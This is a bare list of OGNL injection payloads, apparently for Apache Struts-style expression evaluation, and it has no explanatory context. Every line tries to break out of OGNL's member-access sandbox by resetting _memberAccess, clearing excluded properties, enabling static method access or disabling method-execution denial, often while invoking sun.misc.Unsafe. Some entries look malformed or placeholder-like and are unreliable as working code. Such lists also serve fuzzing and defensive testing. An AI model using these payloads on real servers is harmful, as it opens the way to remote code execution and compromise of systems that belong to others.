%{#_memberAccess=@ognl.OgnlContext,@sun.misc.Unsafe@getUnsafe()}
%{#a=@DEFAULT_MEMBER_ACCESS@ognl.OgnlContext,@sun.misc.Unsafe@getUnsafe()}
%{(@sun.misc.Unsafe@getUnsafe()).(#dm=@ognl.OgnlContext@a)}
%{#a=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@sun.misc.Unsafe@getUnsafe()}
%{#_memberAccess=@DEFAULT_MEMBER_ACCESS,@sun.misc.Unsafe@getUnsafe()}
%{#_memberAccess.excludeProperties=@EMPTY_SET,@sun.misc.Unsafe@getUnsafe()}
%{(@sun.misc.Unsafe@getUnsafe()).(#a.allowStaticMethodAccess=true).(#context["a"]=false)}
%{@sun.misc.Unsafe@getUnsafe(),#_memberAccess.allowStaticMethodAccess=true,#context["xwork.MethodAccessor.denyMethodExecution"]=false}
%{(#a["a"]=true).(#context["a"]=false).(@a@a())}
%{#_memberAccess.a=true,@sun.misc.Unsafe@getUnsafe()}
%{(@sun.misc.Unsafe@getUnsafe()).(#_memberAccess.allowStaticMethodAccess=true)}
